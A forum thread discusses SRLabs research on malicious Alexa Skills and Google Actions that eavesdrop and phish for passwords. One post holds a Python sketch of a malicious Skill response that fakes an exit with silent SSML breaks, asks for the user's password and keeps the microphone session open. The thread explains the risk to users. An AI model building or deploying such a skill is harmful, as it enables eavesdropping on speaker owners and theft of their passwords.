Smart speaker security weaknesses found

I don’t know whether to categorise this under STT or SN, but I guess Steve Gibson will probably pick up on it for SN anyway. So I’m posting under STT because listeners could be interested in knowing when Amazon and Google release fixes.

Researchers have found possible ways of getting some Amazon and Google speakers to keep listening after you think they’ve stopped, generate credible-sounding prompts asking for personal info like passwords, and relay any responses back to the attacker. Here’s an article with details:

https://srlabs.de/bites/smart-spies/

It does appear that an attacker has to create a malicious voice app (a third-party Skill or Action) and get it onto the speaker, so a bit of caution regarding third-party apps may be all that’s needed to avoid this.
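For anyone curious how little is actually involved, here’s a rough Python sketch of the kind of response a malicious Alexa Skill could return, going by my reading of the report. The outputSpeech and shouldEndSession fields are, as far as I know, the genuine Alexa Skills Kit response format; the chained SSML breaks and the phishing wording are just my illustration of the technique, not the researchers’ actual payload.

```python
import json

# Rough sketch only, based on my reading of the report, not the researchers'
# actual payload. A custom Alexa Skill answers requests with JSON roughly in
# this shape; outputSpeech and shouldEndSession are the key fields.

# Chained SSML breaks make the speaker sound idle while the skill's session is
# still active (whether this exact trick still works depends on Amazon's fixes).
silent_pause = '<break time="10s"/>' * 6

ssml = (
    "<speak>"
    "Goodbye!"                                    # sounds like the skill exited
    + silent_pause +                              # ...but it is still listening
    "An important security update is available. "
    "Please say your password."                   # the phishing prompt
    "</speak>"
)

phishing_response = {
    "version": "1.0",
    "response": {
        "outputSpeech": {"type": "SSML", "ssml": ssml},
        # False keeps the session (and microphone) open, so whatever the user
        # says next is delivered to the malicious skill's backend.
        "shouldEndSession": False,
    },
}

print(json.dumps(phishing_response, indent=2))
```

If that’s roughly all it takes, then being careful about which third-party Skills/Actions you enable really does seem like the practical takeaway until Amazon and Google push fixes.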


It was going to happen sooner or later…


I wasn’t really aware there were third-party apps for Google speakers in the same way there are for Amazon Echos. Google speakers have always seemed heavily controlled, with users not really able to activate apps/skills.

Could well be that it’s not a real risk with Google devices. It’s not an area I know a lot about; I was just calling attention to the report, after the link popped up in my Twitter feed from a security news source, in case someone who knows more cares to assess it.

Google calls them “Actions”

You would be familiar with a couple. For a while Leo was suggesting people say “Hey Google, play TWiT Live on TuneIn.”

Here’s the “store”:

https://assistant.google.com/explore


Thanks. That’s totally passed me by. Must listen to Leo more carefully :grinning: